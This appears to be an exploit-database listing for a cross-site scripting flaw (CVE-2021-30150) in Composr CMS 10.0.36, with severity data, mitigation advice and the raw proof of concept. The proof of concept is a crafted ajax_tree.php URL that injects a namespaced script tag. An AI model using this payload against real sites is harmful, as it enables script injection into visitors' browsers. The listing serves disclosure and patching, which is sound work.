header-logo
Suggest Exploit
vendor:
Composr CMS
by:
Orion Hridoy
6.1
CVSS
MEDIUM
Cross Site Scripting
79
CWE
Product Name: Composr CMS
Affected Version From: 10.0.36
Affected Version To: 10.0.36
Patch Exists: YES
Related CWE: CVE-2021-30150
CPE: a:composr:composr_cms:10.0.36
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2021

Composr CMS 10.0.36 – Cross Site Scripting

The Composr CMS version 10.0.36 is vulnerable to cross-site scripting (XSS) attacks. An attacker can exploit a specific endpoint to inject malicious script code, which will be executed in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Composr CMS to a patched version or apply the vendor-provided security patch. Additionally, input validation and output encoding should be implemented to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
# Date: 04/06/2021
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://compo.sr/
# Software Link: https://compo.sr/download.htm
# Version: 10.0.36
# Tested on: Windows/Linux
# CVE : CVE-2021-30150

Vulnerable Endpoint:
https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>

Navigation

Suggest Exploit

Services By CQR